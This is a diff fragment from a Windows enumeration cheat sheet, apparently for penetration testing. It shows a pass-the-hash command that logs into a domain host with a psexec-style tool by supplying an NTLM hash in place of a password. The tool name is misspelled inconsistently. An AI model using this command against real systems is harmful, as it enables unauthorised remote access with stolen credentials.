dspieard/Cheatsheets/BasicWinEnumCheatsheet.md

 ```

 ### pcexec.py
-format for hash is LMHASH:NTHASH, but you can use the NTLM hash twice because windows doesn't really use LMHASH
+Format for hash is LMHASH:NTHASH, but you can use the NTLM hash twice because windows doesn't really use LMHASH
 ```
 psecex.py domainname.local/username@10.10.2.1 -hashes NTLM:NTLM